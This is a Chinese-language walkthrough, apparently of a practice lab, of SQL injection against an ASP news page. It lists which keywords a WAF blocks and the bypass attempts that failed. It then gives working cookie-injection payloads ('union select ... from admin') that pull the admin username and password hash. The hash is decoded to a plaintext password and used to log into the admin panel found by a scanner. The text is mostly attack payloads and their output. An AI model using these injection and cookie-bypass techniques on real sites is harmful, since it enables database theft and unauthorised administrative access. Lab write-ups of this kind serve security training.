点击传送门

来到目标公司网站

 可以看到有很多的网页

现在我们需要寻找注入点，注入点存在的页面一般可以明显的显示出正确页面和错误页面

这里可以看到有新闻页面

有新闻的一般选择新闻页面

我们点击第一个新闻

 进来后可以看到

 URL为

http://g8wepfcp.ia.aqlab.cn/shownews.asp?id=171

开始试探

（1）判断waf拦截的关键字
'触发waf
and触发waf
or触发waf
select触发waf
union order by不会触发waf
--+不能被数据库识别，要使用#
（2）联合查询注入尝试
得到注入点数量，构建联合查询语句
?id=171 union select 1,2,3,4,5,6,7,8,9,10#
利用SQL绕过手法使得select可用
试图转码绕过失败
试图利用/**/和/*!*/绕过失败
放弃联合查询
（3）cookies绕过尝试
尝试cookies绕过
直接访问http://g8wepfcp.ia.aqlab.cn/shownews.asp
利用bp抓包，将原cookies值
Cookie: ASPSESSIONIDACQTQQAS=OKOJFAODPDJCCFEKBAECGJDK
改为
Cookie: id=171

访问网页，发现访问的页面正常输出，cookies可以当值来用
将值改为联合查询语句
并猜测表admin的存在性
Cookie: id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin

页面返回正常，说明admin表存在
且页面返回的字段有2,3,7,8,9
这时可以将注入点2,3,7,8,9替换为字段名，用这种方式来猜测字段的存在，并体现返回值
Cookie: id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
页面返回

username：admin
password：b9a2a2b5dffb918c
利用bp解码后

password为welcome

利用御剑后台扫描工具

 得到后台网站

http://g8wepfcp.ia.aqlab.cn/admin/Login.asp

 输入账户密码

 成功通过